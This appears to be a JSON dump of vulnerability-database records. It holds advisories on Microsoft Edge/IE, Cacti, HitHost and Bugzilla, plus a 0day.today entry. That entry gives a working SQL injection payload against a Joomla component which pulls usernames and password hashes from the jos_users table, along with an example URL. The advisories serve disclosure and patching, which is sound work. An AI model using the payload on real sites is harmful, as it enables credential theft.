\n[CVE-2017-8598](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8598>)7.6Critical \n[CVE-2017-8599](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8599>)4.3Critical \n[CVE-2017-8601](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8601>)7.6Critical \n[CVE-2017-8602](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8602>)4.3Critical \n[CVE-2017-8603](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8603>)7.6Critical \n[CVE-2017-8604](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8604>)7.6Critical \n[CVE-2017-8605](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8605>)7.6Critical \n[CVE-2017-8606](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8606>)7.6Critical \n[CVE-2017-8607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8607>)7.6Critical \n[CVE-2017-8608](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8608>)7.6Critical \n[CVE-2017-8609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8609>)7.6Critical \n[CVE-2017-8610](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8610>)7.6Critical \n[CVE-2017-8611](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8611>)4.3Critical \n[CVE-2017-8617](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8617>)7.6Critical \n[CVE-2017-8618](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8618>)7.6Critical \n[CVE-2017-8619](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8619>)7.6Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038781](<http://support.microsoft.com/kb/4038781>) \n[4025342](<http://support.microsoft.com/kb/4025342>) \n[4025339](<http://support.microsoft.com/kb/4025339>) \n[4025344](<http://support.microsoft.com/kb/4025344>) \n[4025338](<http://support.microsoft.com/kb/4025338>) \n[4025331](<http://support.microsoft.com/kb/4025331>) \n[4025336](<http://support.microsoft.com/kb/4025336>) \n[4025341](<http://support.microsoft.com/kb/4025341>) \n[4025252](<http://support.microsoft.com/kb/4025252>)", "modified": "2019-03-07T00:00:00", "published": "2017-07-11T00:00:00", "id": "KLA11070", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11070", "title": "\r KLA11070Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:35", "bulletinFamily": "unix", "description": "### Background\n\nCacti is a complete frontend to rrdtool.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Cacti. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or remote authenticated users could bypass intended access restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Cacti users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/cacti-0.8.8h\"", "modified": "2016-07-16T00:00:00", "published": "2016-07-16T00:00:00", "id": "GLSA-201607-05", "href": "https://security.gentoo.org/glsa/201607-05", "type": "gentoo", "title": "Cacti: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:47", "bulletinFamily": "unix", "description": "- CVE-2015-8604 (sql injection)\nSQL injection in graphs_new.php.\n\n- CVE-2015-8377 (sql injection)\nSQL injection vulnerability in the host_new_graphs_save function in\ngraphs_new.php.\n\n- CVE-2015-8369 (sql injection)\nSQL injection in graph.php.", "modified": "2016-02-28T00:00:00", "published": "2016-02-28T00:00:00", "id": "ASA-201602-24", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-February/000565.html", "title": "cacti: sql injection", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-15T07:48:27", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-04-12T00:00:00", "published": "2010-04-12T00:00:00", "id": "1337DAY-ID-11757", "href": "https://0day.today/exploit/description/11757", "type": "zdt", "title": "Joomla Component com_sermonspeaker SQL Injection Vulnerability ", "sourceData": "==============================================================\r\nJoomla Component com_sermonspeaker SQL Injection Vulnerability \r\n==============================================================\r\n\r\n# Title:Joomla Component com_sermonspeaker SQL Injection Vulnerability\r\n# Author: SadHaCkEr\r\n# Data : 2010-04-12\r\n \r\n[~]######################################### InformatioN #############################################[~]\r\n \r\n#AUTHOR: SadHaCkEr \r\n#Email: [email\u00a0protected][choose ANY ONE] IF U lucky U will Find Me \r\n#Website: http://www.sadx.297m.com/ \r\n#Forum : http://v4-team.net/cc \r\n \r\n[~]######################################### ExploiT #############################################[~]\r\n \r\n[~] Vulnerable :\r\n \r\nhttp://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]\r\n \r\n[~] ExploiT :\r\n \r\n-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/\r\n \r\n[~] Example :\r\n \r\nhttp://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=\r\n-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/\r\n\r\n\n\n# 0day.today [2018-04-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11757"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nHitHost Cross-Site Scripting and Directory Deletion\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19155\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19155/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nCross Site Scripting, Manipulation of data\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nHitHost 1.x\r\nhttp://secunia.com/product/8604/\r\n\r\nDESCRIPTION:\r\nretard has discovered two vulnerabilities in HitHost, which can be\r\nexploited by malicious people to delete empty directories and conduct\r\ncross-site scripting attacks.\r\n\r\n1) Input passed to the "hits" parameter in "viewuser.php" and the\r\n"user" parameter in "deleteuser.php" isn't properly sanitised before\r\nbeing returned to the user. This can be exploited to execute\r\narbitrary HTML and script code in a user's browser session in context\r\nof an affected site.\r\n\r\n2) Input passed to the "user" parameter in "deleteuser.php" isn't\r\nproperly sanitised before being used to delete directories. This can\r\nbe exploited to delete arbitrary empty directories via directory\r\ntraversal attacks.\r\n\r\nThe vulnerabilities have been confirmed in version 1.0.0. Other\r\nversions may also be affected.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly sanitised.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nretard\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-03-09T00:00:00", "published": "2006-03-09T00:00:00", "id": "SECURITYVULNS:DOC:11757", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11757", "title": "[SA19155] HitHost Cross-Site Scripting and Directory Deletion", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": "\r\n\r\nSummary\r\n=======\r\n\r\nBugzilla is a Web-based bug-tracking system, used by a large number of\r\nsoftware projects.\r\n\r\nThis advisory covers two security bugs that have recently been\r\ndiscovered and fixed in the Bugzilla code:\r\n\r\n+ In all versions of Bugzilla since at least 2.16, it is possible\r\n to guess the name of a hidden product and have Bugzilla confirm that\r\n you were correct.\r\n+ In Bugzilla 2.18 and above, a user's username and password are\r\n sometimes exposed in the URL after generating a Report.\r\n\r\nAll Bugzilla installations are advised to upgrade to the latest stable\r\nversion of Bugzilla, 2.18.1.\r\n\r\nDevelopment snapshots of 2.19 and above are also vulnerable. If you are\r\nusing a development snapshot, you should obtain a newer one (2.19.3)\r\nor use CVS to update or apply the patches from the specific bugs listed\r\nbelow.\r\n\r\n\r\nVulnerability Details\r\n=====================\r\n\r\nIssue 1\r\n-------\r\nClass: Information Leak\r\nVersions: 2.10 through 2.18, 2.19.1, 2.19.2\r\nDescription: If a user correctly guesses the name of a product that\r\n should be invisible to them, they will be specifically\r\n informed that they do not have access to it, thus letting\r\n them know that the product exists.\r\n Also, users can enter bugs into products that are closed for \r\n bug entry, if they correctly guess the name of the product.\r\nReference: https://bugzilla.mozilla.org/show_bug.cgi?id=287109\r\n\r\nIssue 2\r\n-------\r\nClass: User Password Embedded in URL\r\nVersions: 2.17.1 through 2.18, 2.19.1, 2.19.2\r\nDescription: The user's password can be embedded as part of a report URL,\r\n and thus visible in the web server logs, if the user is\r\n prompted to log in while attempting to view a chart.\r\nReference: https://bugzilla.mozilla.org/show_bug.cgi?id=287436\r\n\r\n\r\nVulnerability Solutions\r\n=======================\r\n\r\nThe fixes for all of the security bugs mentioned in this advisory\r\nare included in the 2.16.9, 2.18.1, and 2.19.3 releases. Upgrading\r\nto these releases will protect installations from possible exploits\r\nof these issues.\r\n\r\nFull release downloads, patches to upgrade Bugzilla from previous\r\nversions, and CVS upgrade instructions are available at:\r\n http://www.bugzilla.org/download.html\r\n\r\nSpecific patches for each of the individual issues can be found on the\r\ncorresponding bug reports for each issue, at the URL given in the\r\nreference for that issue in the list above.\r\n\r\n\r\nCredits\r\n=======\r\n\r\nThe Bugzilla team wish to thank the following people for their\r\nassistance in locating, advising us of, and assisting us to fix \r\nthese situations:\r\n\r\nRoman Pszonka\r\nGervase Markham\r\nFr\u0439d\u0439ric Buclin\r\nMyk Melez\r\nJoel Peshkin\r\n\r\n\r\nGeneral information about the Bugzilla bug-tracking system can be found\r\nat http://www.bugzilla.org/\r\n\r\nComments and follow-ups can be directed to the\r\nnetscape.public.mozilla.webtools newsgroup or the mozilla-webtools\r\nmailing list; http://www.bugzilla.org/support/ has directions for\r\naccessing these forums.\r\n\r\n\r\n-Max Kanat-Alexander\r\nRelease Manager, Bugzilla Project", "modified": "2005-05-13T00:00:00", "published": "2005-05-13T00:00:00", "id": "SECURITYVULNS:DOC:8604", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8604", "title": "Security Advisory for Bugzilla 2.18, 2.19.2, and 2.16.8", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:19", "bulletinFamily": "software", "description": "It's possible to determine if closed product exist, password can be leaked as a part of URL.", "modified": "2005-05-13T00:00:00", "published": "2005-05-13T00:00:00", "id": "SECURITYVULNS:VULN:4788", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4788", "title": "Bugzilla bug tracking system information leak", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
